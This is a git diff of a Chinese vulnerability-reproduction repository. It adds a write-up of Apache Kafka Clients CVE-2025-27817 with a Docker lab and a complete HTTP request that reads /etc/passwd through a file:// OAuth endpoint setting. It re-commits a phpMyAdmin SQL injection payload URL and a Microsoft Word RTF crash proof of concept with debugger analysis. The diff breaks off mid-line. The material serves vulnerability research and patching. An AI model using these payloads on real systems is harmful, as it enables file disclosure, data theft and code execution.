diff --git a/README.md b/README.md index b5a88f8..a1e5abe 100644 --- a/README.md +++ b/README.md @@ -583,6 +583,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito * Apache HTTPd 路径穿越漏洞 CVE-2021-41773 * Apache HTTPd 路径穿越漏洞 CVE-2021-42013 * Apache Kafka Clients LDAP注入漏洞 CVE-2023-25194 + * Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817 * Apache Kylin config 未授权配置泄露 CVE-2020-13937 * Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956 * Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925 @@ -792,6 +793,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito * Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980 * Apache Commons Text 远程代码执行漏洞 CVE-2022-42889 + * Apache Dubbo Hessian 反序列化漏洞 CVE-2020-1948 * Apache Dubbo Java反序列化漏洞 CVE-2019-17564 * Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518 * Apache Flink 目录遍历漏洞 CVE-2020-17519 diff --git a/Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md b/Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md index 483f0d2..f5b3509 100644 --- a/Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md +++ b/Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md @@ -1,19 +1,19 @@ -# phpMyAdmin后台SQL注入 CVE-2020-26935 - -## 漏洞描述 - -在4.9.6之前的phpMyAdmin和5.0.3之前的5.x的SearchController中发现一个问题。在phpMyAdmin如何处理搜索功能中的SQL语句中发现了一个SQL注入漏洞。攻击者可以利用此漏洞将恶意SQL注入查询。 - -参考链接: - -- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935 -- https://xz.aliyun.com/t/8524 - -## 漏洞复现 - -payload: - -``` -http://127.0.0.1/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1) -``` - +# phpMyAdmin后台SQL注入 CVE-2020-26935 + +## 漏洞描述 + +在4.9.6之前的phpMyAdmin和5.0.3之前的5.x的SearchController中发现一个问题。在phpMyAdmin如何处理搜索功能中的SQL语句中发现了一个SQL注入漏洞。攻击者可以利用此漏洞将恶意SQL注入查询。 + +参考链接: + +- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935 +- https://xz.aliyun.com/t/8524 + +## 漏洞复现 + +payload: + +``` +http://127.0.0.1/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1) +``` + diff --git a/中间件漏洞/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817.md b/中间件漏洞/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817.md new file mode 100644 index 0000000..46cc4a8 --- /dev/null +++ b/中间件漏洞/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817.md @@ -0,0 +1,108 @@ +# Apache Kafka Clients 任意文件读取与 SSRF 漏洞 CVE-2025-27817 + +## 漏洞描述 + +Apache Kafka 客户端接受用于设置与代理服务器的 `SASL/OAUTHBEARER` 连接的配置数据,包括 `sasl.oauthbearer.token.endpoint.url` 和 `sasl.oauthbearer.jwks.endpoint.url`。Apache Kafka 允许客户端读取任意文件并将内容返回到错误日志中,或将请求发送到非预期位置。如果在应用程序中,Apache Kafka 客户端配置可由不受信任方指定,攻击者可能会使用 `sasl.oauthbearer.token.endpoint.url` 和 `sasl.oauthbearer.jwks.endpoint.url` 配置读取磁盘和环境变量中的任意内容,或向非预期位置发出请求。 + +参考链接: + +- https://www.openwall.com/lists/oss-security/2025/06/09/1 +- https://kafka.apache.org/cve-list +- https://www.cve.org/CVERecord?id=CVE-2025-27818 + +## 漏洞影响 + +``` +3.1.0 <= Apache Kafka Client <= 3.9.0 +``` + +## 环境搭建 + +docker-compose.yml + +``` +version: '2' +services: + web: + image: vulhub/apache-druid:25.0.0 + ports: + - "8888:8888" +``` + +执行如下命令启动一个 Apache Druid 25.0.0 服务,其内部使用的 kafka-clients 版本是 3.3.1: + +``` +docker-compose up -d +``` + +服务启动后,访问 `http://your-ip:8888` 即可查看到 Apache Druid 主页。 + +![](images/Apache%20Kafka%20Clients%20任意文件读取与SSRF%20漏洞%20CVE-2025-27817/image-20250613161826759.png) + +## 漏洞复现 + +读取 `/etc/passwd`: + +``` +POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 +Host: your-ip:8888 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Accept: */* +Referer: http://your-ip:8888/unified-console.html +Accept-Encoding: gzip, deflate +Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 +Content-Type: application/json + +{ + "type": "kafka", + "spec": { + "type": "kafka", + "ioConfig": { + "type": "kafka", + "consumerProperties": { + "bootstrap.servers": "127.0.0.1:6666", + "sasl.mechanism": "OAUTHBEARER", + "security.protocol": "SASL_SSL", + "sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler", + "sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd", + "sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required sasl.oauthbearer.token.endpoint.url=\"http://127.0.0.1:9999/token\" sasl.oauthbearer.jwks.endpoint.url=\"http://127.0.0.1:9999/jwks\" sasl.oauthbearer.client.id=your-client-id sasl.oauthbearer.client.secret=your-client-secret sasl.oauthbearer.expected.audience=kafka sasl.oauthbearer.expected.issuer=\"http://127.0.0.1:9999\" useFirstPass=true serviceName=kafka debug=true;" + }, + "topic": "test", + "useEarliestOffset": true, + "inputFormat": { + "type": "regex", + "pattern": "([\\s\\S]*)", + "listDelimiter": "", + "columns": ["raw"] + } + }, + "dataSchema": { + "dataSource": "sample", + "timestampSpec": { + "column": "!!!_no_such_column_!!!", + "missingValue": "1970-01-01T00:00:00Z" + }, + "dimensionsSpec": {}, + "granularitySpec": { + "rollup": false + } + }, + "tuningConfig": { + "type": "kafka" + } + }, + "samplerConfig": { + "numRows": 500, + "timeoutMs": 15000 + } +} +``` + +![](images/Apache%20Kafka%20Clients%20任意文件读取与SSRF%20漏洞%20CVE-2025-27817/image-20250613162007132.png) + +## 漏洞修复 + +更新至最新版本。自 Apache Kafka 3.9.1/4.0.0 版本起,添加了一个系统属性 `-Dorg.apache.kafka.sasl.oauthbearer.allowed.urls`,用于在 SASL JAAS 配置中设置允许的 URL。 + +- 在 3.9.1 版本中,为了向后兼容,它默认接受所有 URL。 +- 在 4.0.0 及更新版本中,默认值为空列表,用户必须明确设置允许的 URL。 diff --git a/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613161826759.png b/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613161826759.png new file mode 100644 index 0000000..9f11077 Binary files /dev/null and b/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613161826759.png differ diff --git a/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613162007132.png b/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613162007132.png new file mode 100644 index 0000000..b6807b3 Binary files /dev/null and b/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613162007132.png differ diff --git a/其他漏洞/Microsoft Word 远程代码执行漏洞 CVE-2023-21716.md b/其他漏洞/Microsoft Word 远程代码执行漏洞 CVE-2023-21716.md index 2392c76..772de9a 100644 --- a/其他漏洞/Microsoft Word 远程代码执行漏洞 CVE-2023-21716.md +++ b/其他漏洞/Microsoft Word 远程代码执行漏洞 CVE-2023-21716.md @@ -1,257 +1,257 @@ -# Microsoft Word 远程代码执行漏洞 CVE-2023-21716 - -## 漏洞描述 - -Microsoft Office Word是微软公司的一个文字处理器应用程序。Word给用户提供了用于创建专业而优雅的文档工具。 - -该漏洞存在于Microsoft Word的RTF解析器(wwlib)中,是一个远程代码执行漏洞,攻击者可以制作包含过多字体表项的RTF文件,并诱导用户打开来利用此漏洞。攻击者可利用多种方式诱导用户下载并打开特制文档,如电子邮件、即时消息等等。用户使用预览窗格也会触发此漏洞。成功利用此漏洞可能在目标系统上以该用户权限执行代码。 - -近日漏洞发现者 Joshua J. Drake 公布了漏洞的 POC。 - -参考链接: - -- https://qoop.org/publications/cve-2023-21716-rtf-fonttbl.md - -## 分析环境 - -``` -Windows 10 x64 1607 -Office 2016,Windbg,IDA Pro 7.5 -wwlib(16.0.4266.1003) -``` - -## 漏洞复现 - -POC.rtf 使用 Joshua J. Drake 提供的 python 脚本生成。 - -``` -import sys -open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) -``` - -POC.rtf 的内容较为简单,仅包括 \rtfN、\fonttbl、\fN 和 \rtlch 控制字,此次漏洞发生在 rtf 解释器 wwlib 模块处理 \fonttbl 和 \fN 控制字时,POC.rtf 内容如下。 - -``` -{\rtf1{ -{\fonttbl{\f0A;} -{\f1A;} -{\f2A;} -{\f3A;} -{\f4A;} -{\f5A;} -{\f6A;} -... -{\f32755A;} -{\f32756A;} -{\f32757A;} -{\f32758A;} -{\f32759A;} -{\f32760A;} -} -{\rtlch no crash??} -}} -``` - -对 winword.exe 开启页堆,可以得到以下的栈回溯。 - -``` -(c70.dc): Access violation - code c0000005 (first chance) -First chance exceptions are reported before any exception handling. -This exception may be expected and handled. -eax=006f23ac ebx=00000001 ecx=000004e4 edx=ffff7ffc esi=362ceff0 edi=00008002 -eip=6abb00d5 esp=006f2304 ebp=006f2310 iopl=0 nv up ei pl nz na pe nc -cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 -wwlib!PTLS7::FsUpdateFinitePage+0x7635a: -6abb00d5 66894c5604 mov word ptr [esi+edx*2+4],cx ds:002b:362befec=???? -0:000> kv - # ChildEBP RetAddr Args to Child -WARNING: Stack unwind information not available. Following frames may be wrong. -00 006f2310 6abaa3ef 17da1268 00007ff8 006f238c wwlib!PTLS7::FsUpdateFinitePage+0x7635a -01 006f51e8 6aba651c 17da1230 006f555c 0005d400 wwlib!PTLS7::FsUpdateFinitePage+0x70674 -02 006f579c 6aef05ac 17da1230 006f57dc 00000070 wwlib!PTLS7::FsUpdateFinitePage+0x6c7a1 -03 006f5bec 6aeeffb5 0000000b 17da1230 17da1264 wwlib!PTLS7::LsDestroyContext+0x246427 -04 006f5e40 6aa4a593 0000000b 04012000 40280000 wwlib!PTLS7::LsDestroyContext+0x245e30 -05 006f772c 6a9068ef 0000000b 00000000 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x17494 -06 006f7c54 6aa654ed 006f8530 00000001 00000000 wwlib!PTLS7::LsAssert+0x2bd1c -07 006f905c 6aa63d3b 006f93f0 006f93e8 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x323ee -08 006f90e0 6b56be52 006f93f0 006f93e8 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x30c3c -09 006fa66c 6ae6013a 006fa6c8 00000824 00000000 wwlib!wdGetApplicationObject+0xdf8a0 -0a 006fb718 6aca4e9e 006ff990 ffffffff 00000001 wwlib!PTLS7::LsDestroyContext+0x1b5fb5 -0b 006fb948 6a8ceb47 7668a200 6a8c0000 00000001 wwlib!PTLS7::LsQueryLineUp+0x41cf1 -0c 006fb978 6a8ce971 0000000a 00430022 005c003a wwlib!FMain+0x273 -0d 006ff9fc 6a8ce906 0000000a 6a8ce8d4 006ffa30 wwlib!FMain+0x9d -0e 006ffa0c 00141762 00140000 00000000 02fbefd4 wwlib!FMain+0x32 -0f 006ffa30 00141194 00140000 00000000 02fbefd4 winword+0x1762 -10 006ffa7c 766862c4 0045c000 766862a0 1455d81a winword+0x1194 -11 006ffa90 77ed0609 0045c000 6d907d52 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo]) -12 006ffad8 77ed05d4 ffffffff 77ef2523 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH]) -13 006ffae8 00000000 00141000 0045c000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) -``` - -通过栈回溯得到以下调用链,由于没有 wwlib.dll 模块的符号只简单的揣测了一下几个关键函数的作用。 - -![image-20230314102008169](images/image-20230314102008169.png) - -## 漏洞分析 - -查看 crash func(sub_102F0020) 及崩溃地址处的上下文,经过一番调试摸清了 sub_102F0020 函数的参数意义和崩溃原因。 - -sub_102F0020 函数用于处理 fond id 也就是 /fN 中的 N,其会将 fond id 和 codepage value 存储在一个由 Cum 和 Base 计算偏移的地址上。Base 的初始值是 0xa,且每当处理了 0xa 个 fond id 就会累加 0xa。 - -![图片](images/640.png) - -存储 fond id 和 codepage value 的代码片段同时也是 crash 时的上下文。 - -``` -.text:102F00A2 movsx eax, word ptr [esi]//获得 Cum -.text:102F00A5 mov ecx, [ebp+arg_4]//获得 fond id -.text:102F00A8 mov [esi+eax*2+4], cx//存储 fond id <---- bp1 -.text:102F00AD movsx eax, word ptr [esi+2] -.text:102F00B1 movsx ecx, word ptr [esi] -.text:102F00B4 add ecx, eax -.text:102F00B6 mov eax, [ebp+arg_8] -.text:102F00B9 mov ax, [eax] -.text:102F00BC mov [esi+ecx*2+4], ax -.text:102F00C1 mov eax, [ebp+arg_10] -.text:102F00C4 test eax, eax -.text:102F00C6 jz short loc_102F00DA -.text:102F00C8 movsx ecx, word ptr [esi]//获得 Cum -.text:102F00CB movsx edx, word ptr [esi+2]//获得 Base <---- bp2 -.text:102F00CF lea edx, [ecx+edx*2]//计算偏移 <---- bp3 -.text:102F00D2 mov cx, [eax]//获得 codepage value -.text:102F00D5 mov [esi+edx*2+4], cx//存储 codepage value <---- bp4 <- crash -.text:102F00DA inc word ptr [esi]//增加 Cum 计数 -``` - -在上述代码片段中下 4 个断点查看存储过程,注意各寄存器对应关系。 - -``` -bp wwlib+2F00A8 ".printf \" Cum: %p Font id: %p Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", eax,ecx,(esi+eax*2+4),esi,eax; gc" -bp wwlib+2F00CB ".printf \" Base: %p \\n \", poi(esi+2); gc" -bp wwlib+2F00CF ".printf \" Edx: %p from 0x%x + 0x%x*2\\n \", (ecx + edx*2),ecx,edx; gc" -bp wwlib+2F00D5 ".printf \" Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", (esi+edx*2+4),esi,edx; gc" -``` - -崩溃前断点记录到的存储过程信息。 - -``` - ... - --------------------------------------------------------------------------------------- - Cum: 00007fec Font id: 00007fec Target addr: 3b3e0044 from 0x3b3d0068 + 0x7fec*2 + 4 - Base: 00007fee - Edx: 00017fc8 from 0x7fec + 0x7fee*2 - Target addr: 3b3ffffc from 0x3b3d0068 + 0x17fc8*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007fed Font id: 00007fed Target addr: 3b3e0046 from 0x3b3d0068 + 0x7fed*2 + 4 - Base: 00007fee - Edx: 00017fc9 from 0x7fed + 0x7fee*2 - Target addr: 3b3ffffe from 0x3b3d0068 + 0x17fc9*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007fee Font id: 00007fee Target addr: 3e538008 from 0x3e528028 + 0x7fee*2 + 4 - Base: 00007ff8 - Edx: 00017fde from 0x7fee + 0x7ff8*2 - Target addr: 3e557fe8 from 0x3e528028 + 0x17fde*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007fef Font id: 00007fef Target addr: 3e53800a from 0x3e528028 + 0x7fef*2 + 4 - Base: 00007ff8 - Edx: 00017fdf from 0x7fef + 0x7ff8*2 - Target addr: 3e557fea from 0x3e528028 + 0x17fdf*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff0 Font id: 00007ff0 Target addr: 3e53800c from 0x3e528028 + 0x7ff0*2 + 4 - Base: 00007ff8 - Edx: 00017fe0 from 0x7ff0 + 0x7ff8*2 - Target addr: 3e557fec from 0x3e528028 + 0x17fe0*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff1 Font id: 00007ff1 Target addr: 3e53800e from 0x3e528028 + 0x7ff1*2 + 4 - Base: 00007ff8 - Edx: 00017fe1 from 0x7ff1 + 0x7ff8*2 - Target addr: 3e557fee from 0x3e528028 + 0x17fe1*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff2 Font id: 00007ff2 Target addr: 3e538010 from 0x3e528028 + 0x7ff2*2 + 4 - Base: 00007ff8 - Edx: 00017fe2 from 0x7ff2 + 0x7ff8*2 - Target addr: 3e557ff0 from 0x3e528028 + 0x17fe2*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff3 Font id: 00007ff3 Target addr: 3e538012 from 0x3e528028 + 0x7ff3*2 + 4 - Base: 00007ff8 - Edx: 00017fe3 from 0x7ff3 + 0x7ff8*2 - Target addr: 3e557ff2 from 0x3e528028 + 0x17fe3*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff4 Font id: 00007ff4 Target addr: 3e538014 from 0x3e528028 + 0x7ff4*2 + 4 - Base: 00007ff8 - Edx: 00017fe4 from 0x7ff4 + 0x7ff8*2 - Target addr: 3e557ff4 from 0x3e528028 + 0x17fe4*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff5 Font id: 00007ff5 Target addr: 3e538016 from 0x3e528028 + 0x7ff5*2 + 4 - Base: 00007ff8 - Edx: 00017fe5 from 0x7ff5 + 0x7ff8*2 - Target addr: 3e557ff6 from 0x3e528028 + 0x17fe5*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff6 Font id: 00007ff6 Target addr: 3e538018 from 0x3e528028 + 0x7ff6*2 + 4 - Base: 00007ff8 - Edx: 00017fe6 from 0x7ff6 + 0x7ff8*2 - Target addr: 3e557ff8 from 0x3e528028 + 0x17fe6*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff7 Font id: 00007ff7 Target addr: 3e53801a from 0x3e528028 + 0x7ff7*2 + 4 - Base: 00007ff8 - Edx: 00017fe7 from 0x7ff7 + 0x7ff8*2 - Target addr: 3e557ffa from 0x3e528028 + 0x17fe7*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff8 Font id: 00007ff8 Target addr: 362defe4 from 0x362ceff0 + 0x7ff8*2 + 4 - Base: 00008002 - Edx: ffff7ffc from 0x7ff8 + 0xffff8002*2 - Target addr: 362befec from 0x362ceff0 + 0xffff7ffc*2 + 4 -``` - -观察记录及断点处的汇编代码,发现崩溃是由 bp2 处的 movsx 指令引起的整数溢出导致。 - -![图片](images/640-16787604735695.png) - -由上图中的记录 2 可以发现,bp2 处获得的 Base 由 0x8002 变为了 edx 中的 0xffff8002,变化的原因是 movsx 指令是带符号扩展的,而 0x8002 的最高位又恰好为 1。这也就导致 bp3 处的 edx 和 bp4 处的 Target addr 整数溢出,并最终在 bp4 处发生堆损坏。 - -![图片](images/640-16787604818848.jpeg) - -Target addr 整数溢出。 - -![图片](images/640-167876049401111.jpeg) - -## 补丁分析 - -将 Office 更新到最新后再次打开 POC.rtf 发现依然会造成崩溃,不过此崩溃是 winword.exe 提前检测到即将造成堆损坏而主动引发的,另外发现微软提供了此版本 wwlib.dll 的符号文件,此栈回溯与之前的基本一致。 - -``` -(174c.149c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) -eax=00008002 ebx=00007ff8 ecx=00000005 edx=ffffffff esi=7e221028 edi=00007ff8 -eip=6cccec57 esp=004f10f4 ebp=004f110c iopl=0 nv up ei pl nz ac pe nc -cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 -wwlib!FSearchFtcmap+0x182: -6cccec57 cd29 int 29h -0:000> kv - # ChildEBP RetAddr Args to Child -00 004f110c 6d9f1494 004f119c 00000001 004f1188 wwlib!FSearchFtcmap+0x182 (FPO: [Non-Fpo]) -01 004f35d8 6d9e347e bb594bde 1c597028 0005d400 wwlib!RtfInRare+0x1848 (FPO: [Non-Fpo]) -02 004f3a0c 6d9ff40f 00000070 1c597028 505daa50 wwlib!CchRtfInCore+0x28df (FPO: [Non-Fpo]) -03 004f3c5c 6d9fecc4 1c59702c 004fa0d0 004f5a60 wwlib!RtfGetChars+0x183 (FPO: [Non-Fpo]) -04 004f3ca8 6c97a74a 40280000 00200002 56b28f10 wwlib!PdodCreateRtf+0x177 (FPO: [6,13,4]) -05 004f5404 6c528610 04012000 20280000 00200002 wwlib!`Mso::Details::SharedMutexPool::Get'::`2'::`dynamic atexit destructor for 's_mutexPool''+0x15be8d -06 004f5758 6c52829b 00000000 ffffffff 00000000 wwlib!PdodCreatePfnCore+0x33a (FPO: [Non-Fpo]) -07 004f57dc 6c504161 00000000 ffffffff 00000000 wwlib!PdodCreatePfnBPPaapWithEdpi+0x75 (FPO: [18,3,4]) -08 004f8df4 6c5001b5 04012000 00000000 00000002 wwlib!PdodOpenFnmCore2+0x22eb (FPO: [Non-Fpo]) -09 004f8ebc 6d2d3628 04012000 00000000 00000002 wwlib!PdodOpenFnmCore+0xb9 (FPO: [15,30,0]) -0a 004f9fe8 6d2d332e 00000000 00000000 00000002 wwlib!FFileOpenXszCore+0x2e7 (FPO: [Non-Fpo]) -0b 004fa024 6c7b525d 00000000 00000000 00000002 wwlib!FFileOpenXstzCore+0x3d (FPO: [6,4,0]) -0c 004fb4c4 6c3cc272 00000001 00000000 6c3cc22c wwlib!IfrInitArgs+0x7ef (FPO: [Non-Fpo]) -0d 004fb6fc 6c309720 bb59c6ba 74cda210 0000000a wwlib!Boot::IfrParseCommandLine2+0x46 (FPO: [Non-Fpo]) -0e 004fb774 6c309542 004fb7a4 6c300000 6c309234 wwlib!Boot::FRun+0xb4 (FPO: [Non-Fpo]) -0f 004ff830 6c309298 83385031 00000540 bb5989b6 wwlib!FWordBoot+0x5a (FPO: [Non-Fpo]) -10 004ff864 00941917 00940000 00000000 0000000a wwlib!FMain+0x64 (FPO: [Non-Fpo]) -11 004ffab4 0094114a 00940000 00000000 0077efd4 winword!WinMain+0x146 (FPO: [Non-Fpo]) -12 004ffb00 74cd62c4 003e5000 74cd62a0 454ba229 winword!std::_Deallocate<8,0>+0x1e3 (FPO: [Non-Fpo]) -13 004ffb14 77ae0fa9 003e5000 11605f5b 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo]) -14 004ffb5c 77ae0f74 ffffffff 77b02ed1 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH]) -15 004ffb6c 00000000 00941000 003e5000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) -``` - -补丁文件中新增的范围检测。 - +# Microsoft Word 远程代码执行漏洞 CVE-2023-21716 + +## 漏洞描述 + +Microsoft Office Word是微软公司的一个文字处理器应用程序。Word给用户提供了用于创建专业而优雅的文档工具。 + +该漏洞存在于Microsoft Word的RTF解析器(wwlib)中,是一个远程代码执行漏洞,攻击者可以制作包含过多字体表项的RTF文件,并诱导用户打开来利用此漏洞。攻击者可利用多种方式诱导用户下载并打开特制文档,如电子邮件、即时消息等等。用户使用预览窗格也会触发此漏洞。成功利用此漏洞可能在目标系统上以该用户权限执行代码。 + +近日漏洞发现者 Joshua J. Drake 公布了漏洞的 POC。 + +参考链接: + +- https://qoop.org/publications/cve-2023-21716-rtf-fonttbl.md + +## 分析环境 + +``` +Windows 10 x64 1607 +Office 2016,Windbg,IDA Pro 7.5 +wwlib(16.0.4266.1003) +``` + +## 漏洞复现 + +POC.rtf 使用 Joshua J. Drake 提供的 python 脚本生成。 + +``` +import sys +open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) +``` + +POC.rtf 的内容较为简单,仅包括 \rtfN、\fonttbl、\fN 和 \rtlch 控制字,此次漏洞发生在 rtf 解释器 wwlib 模块处理 \fonttbl 和 \fN 控制字时,POC.rtf 内容如下。 + +``` +{\rtf1{ +{\fonttbl{\f0A;} +{\f1A;} +{\f2A;} +{\f3A;} +{\f4A;} +{\f5A;} +{\f6A;} +... +{\f32755A;} +{\f32756A;} +{\f32757A;} +{\f32758A;} +{\f32759A;} +{\f32760A;} +} +{\rtlch no crash??} +}} +``` + +对 winword.exe 开启页堆,可以得到以下的栈回溯。 + +``` +(c70.dc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=006f23ac ebx=00000001 ecx=000004e4 edx=ffff7ffc esi=362ceff0 edi=00008002 +eip=6abb00d5 esp=006f2304 ebp=006f2310 iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +wwlib!PTLS7::FsUpdateFinitePage+0x7635a: +6abb00d5 66894c5604 mov word ptr [esi+edx*2+4],cx ds:002b:362befec=???? +0:000> kv + # ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +00 006f2310 6abaa3ef 17da1268 00007ff8 006f238c wwlib!PTLS7::FsUpdateFinitePage+0x7635a +01 006f51e8 6aba651c 17da1230 006f555c 0005d400 wwlib!PTLS7::FsUpdateFinitePage+0x70674 +02 006f579c 6aef05ac 17da1230 006f57dc 00000070 wwlib!PTLS7::FsUpdateFinitePage+0x6c7a1 +03 006f5bec 6aeeffb5 0000000b 17da1230 17da1264 wwlib!PTLS7::LsDestroyContext+0x246427 +04 006f5e40 6aa4a593 0000000b 04012000 40280000 wwlib!PTLS7::LsDestroyContext+0x245e30 +05 006f772c 6a9068ef 0000000b 00000000 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x17494 +06 006f7c54 6aa654ed 006f8530 00000001 00000000 wwlib!PTLS7::LsAssert+0x2bd1c +07 006f905c 6aa63d3b 006f93f0 006f93e8 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x323ee +08 006f90e0 6b56be52 006f93f0 006f93e8 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x30c3c +09 006fa66c 6ae6013a 006fa6c8 00000824 00000000 wwlib!wdGetApplicationObject+0xdf8a0 +0a 006fb718 6aca4e9e 006ff990 ffffffff 00000001 wwlib!PTLS7::LsDestroyContext+0x1b5fb5 +0b 006fb948 6a8ceb47 7668a200 6a8c0000 00000001 wwlib!PTLS7::LsQueryLineUp+0x41cf1 +0c 006fb978 6a8ce971 0000000a 00430022 005c003a wwlib!FMain+0x273 +0d 006ff9fc 6a8ce906 0000000a 6a8ce8d4 006ffa30 wwlib!FMain+0x9d +0e 006ffa0c 00141762 00140000 00000000 02fbefd4 wwlib!FMain+0x32 +0f 006ffa30 00141194 00140000 00000000 02fbefd4 winword+0x1762 +10 006ffa7c 766862c4 0045c000 766862a0 1455d81a winword+0x1194 +11 006ffa90 77ed0609 0045c000 6d907d52 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo]) +12 006ffad8 77ed05d4 ffffffff 77ef2523 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH]) +13 006ffae8 00000000 00141000 0045c000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) +``` + +通过栈回溯得到以下调用链,由于没有 wwlib.dll 模块的符号只简单的揣测了一下几个关键函数的作用。 + +![image-20230314102008169](images/image-20230314102008169.png) + +## 漏洞分析 + +查看 crash func(sub_102F0020) 及崩溃地址处的上下文,经过一番调试摸清了 sub_102F0020 函数的参数意义和崩溃原因。 + +sub_102F0020 函数用于处理 fond id 也就是 /fN 中的 N,其会将 fond id 和 codepage value 存储在一个由 Cum 和 Base 计算偏移的地址上。Base 的初始值是 0xa,且每当处理了 0xa 个 fond id 就会累加 0xa。 + +![图片](images/640.png) + +存储 fond id 和 codepage value 的代码片段同时也是 crash 时的上下文。 + +``` +.text:102F00A2 movsx eax, word ptr [esi]//获得 Cum +.text:102F00A5 mov ecx, [ebp+arg_4]//获得 fond id +.text:102F00A8 mov [esi+eax*2+4], cx//存储 fond id <---- bp1 +.text:102F00AD movsx eax, word ptr [esi+2] +.text:102F00B1 movsx ecx, word ptr [esi] +.text:102F00B4 add ecx, eax +.text:102F00B6 mov eax, [ebp+arg_8] +.text:102F00B9 mov ax, [eax] +.text:102F00BC mov [esi+ecx*2+4], ax +.text:102F00C1 mov eax, [ebp+arg_10] +.text:102F00C4 test eax, eax +.text:102F00C6 jz short loc_102F00DA +.text:102F00C8 movsx ecx, word ptr [esi]//获得 Cum +.text:102F00CB movsx edx, word ptr [esi+2]//获得 Base <---- bp2 +.text:102F00CF lea edx, [ecx+edx*2]//计算偏移 <---- bp3 +.text:102F00D2 mov cx, [eax]//获得 codepage value +.text:102F00D5 mov [esi+edx*2+4], cx//存储 codepage value <---- bp4 <- crash +.text:102F00DA inc word ptr [esi]//增加 Cum 计数 +``` + +在上述代码片段中下 4 个断点查看存储过程,注意各寄存器对应关系。 + +``` +bp wwlib+2F00A8 ".printf \" Cum: %p Font id: %p Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", eax,ecx,(esi+eax*2+4),esi,eax; gc" +bp wwlib+2F00CB ".printf \" Base: %p \\n \", poi(esi+2); gc" +bp wwlib+2F00CF ".printf \" 